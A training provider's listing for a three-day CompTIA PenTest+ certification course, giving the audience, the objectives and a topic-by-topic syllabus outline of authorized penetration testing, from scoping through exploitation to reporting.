CompTIA PenTest+ Certification

CompTIA PenTest+ Certification

Audience

CompTIA PenTest+ is a certification for intermediate level cybersecurity professionals who are tasked with hands-on penetration testing to identify, exploit, report, and manage vulnerabilities on a network. It is ideal for:

  • Penetration Testers
  • Vulnerability Testers
  • Security Analysts
  • Vulnerability Assessment Analysts
  • Network Security Operations Personnel
  • Application Security Vulnerability Personnel

Prerequisites

While there are no required prerequisites, the following are recommended:

Duration

3 days. Hands-on.

Course Objectives

CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks.

The CompTIA PenTest+ certification (Exam PT0-001) verifies that successful candidates have the knowledge and skills required to plan and scope an assessment, understand legal and compliance requirements, perform vulnerability scanning and penetration testing, analyze data, effectively report and communicate results, and provide practical recommendations.

The exam can be taken as part of the course and includes both hands-on, performance-based, questions and multiple-choice, to ensure each candidate possesses the skills, knowledge, and ability to perform tasks on systems. It also includes management skills used to plan, scope, and manage weaknesses, not just exploit them. PenTest+ is unique because candidates are required to demonstrate the ability and knowledge to test devices in new environments such as the cloud and mobile, in addition to traditional desktops and servers.

What skills will you learn?

  • Planning and Scoping - Explain the importance of planning and key aspects of compliance-based assessments
  • Information Gathering and Vulnerability Identification - Gather information to prepare for exploitation then perform a vulnerability scan and analyze results
  • Attacks and Exploits - Exploit network, wireless, application, and RF-based vulnerabilities, summarize physical security attacks, and perform post-exploitation techniques
  • Penetration Testing Tools - Conduct information gathering exercises with various tools and analyze output and basic scripts (limited to: Bash, Python, Ruby, PowerShell)
  • Reporting and Communication - Utilize report writing and handling best practices explaining recommended mitigation strategies for discovered vulnerabilities

Course Content

Planning and Scoping

Explain the importance of planning for an engagement
Understanding the target audience
Rules of engagement
Communication escalation path
Resources and requirements
Budget
Impact analysis and remediation timelines
Disclaimers
Technical constraints
Support resources

Explain key legal concepts
Contracts
Environmental differences
Written authorization

Explain the importance of scoping an engagement properly
Types of assessment
Special scoping considerations
Target selection
Strategy
Risk acceptance
Tolerance to impact
Scheduling
Scope creep
Threat actors

Explain the key aspects of compliance-based assessments
Compliance-based assessments, limitations, and caveats
Clearly defined objectives based on regulations

Information Gathering and Vulnerability Identification

Given a scenario, conduct information gathering using appropriate techniques
Scanning
Enumeration
Packet crafting
Packet inspection
Fingerprinting
Cryptography
Eavesdropping
Decompilation
Debugging
Open Source Intelligence Gathering

Given a scenario, perform a vulnerability scan
Credentialed vs. non-credentialed
Types of scans
Container security
Application scan
Considerations of vulnerability scanning

Given a scenario, analyze vulnerability scan results
Asset categorization
Adjudication
Prioritization of vulnerabilities
Common themes

Explain the process of leveraging information to prepare for exploitation
Map vulnerabilities to potential exploits
Prioritize activities in preparation for penetration test
Describe common techniques to complete attack

Explain weaknesses related to specialized systems
ICS
SCADA
Mobile
IoT
Embedded
Point-of-sale system
Biometrics
Application containers
RTOS

Attacks and Exploits

Compare and contrast social engineering attacks
Phishing
Elicitation
Interrogation
Impersonation
Shoulder surfing
USB key drop
Motivation techniques

Given a scenario, exploit network-based vulnerabilities
Name resolution exploits
SMB exploits
SNMP exploits
SMTP exploits
FTP exploits
DNS cache poisoning
Pass the hash
Man-in-the-middle
DoS/stress test
NAC bypass
VLAN hopping

Given a scenario, exploit wireless and RF-based vulnerabilities
Evil twin
Deauthentication attacks
Fragmentation attacks
Credential harvesting
WPS implementation weakness
Bluejacking
Bluesnarfing
RFID cloning
Jamming
Repeating

Given a scenario, exploit application-based vulnerabilities
Injections
Authentication
Authorization
Cross-site scripting (XSS)
Cross-site request forgery (CSRF/XSRF)
Clickjacking
Security misconfiguration
File inclusion
Unsecure code practices

Given a scenario, exploit local host vulnerabilities
OS vulnerabilities
Unsecure service and protocol configurations
Privilege escalation
Default account settings
Sandbox escape
Physical device security

Summarize physical security attacks related to facilities
Piggybacking/tailgating
Fence jumping
Dumpster diving
Lock picking
Lock bypass
Egress sensor
Badge cloning

Given a scenario, perform post-exploitation techniques
Lateral movement
Persistence
Covering your tracks

Penetration Testing Tools

Given a scenario, use Nmap to conduct information gathering exercises
SYN scan (-sS) vs. full connect scan (-sT)
Port selection (-p)
Service identification (-sV)
OS fingerprinting (-O)
Disabling ping (-Pn)
Target input file (-iL)
Timing (-T)
Output parameters

Compare and contrast various use cases of tools
Use cases
Tools

Given a scenario, analyze tool output or data related to a penetration test
Password cracking
Pass the hash
Setting up a bind shell
Getting a reverse shell
Proxying a connection
Uploading a web shell
Injections

Given a scenario, analyze a basic script (limited to Bash, Python, Ruby, and PowerShell)
Logic
I/O
Substitutions
Variables
Common operations
Error handling
Arrays
Encoding/decoding

Reporting and Communication

Given a scenario, use report writing and handling best practices
Normalization of data
Written report of findings and remediation
Risk appetite
Storage time for report
Secure handling and disposition of reports

Explain post-report delivery activities
Post-engagement cleanup
Client acceptance
Lessons learned
Follow-up actions/retest
Attestation of findings

Given a scenario, recommend mitigation strategies for discovered vulnerabilities
Solutions
Findings
Remediation

Explain the importance of communication during the penetration testing process
Communication path
Communication triggers
Reasons for communication
Goal reprioritization

Virtual Courses

ALL of our courses can be delivered virtually. And our Bath public schedule of courses are now available as live virtual sessions, using the popular Zoom Virtual Classroom and remote labs. Delegates can test their access at: www.zoom.us/test

Public Courses

On-Site Courses

Can't attend one of our public classes? Booking for multiple people?

All our courses are available on your site! Delivered for your staff, at your premises.

Contact us to find out more...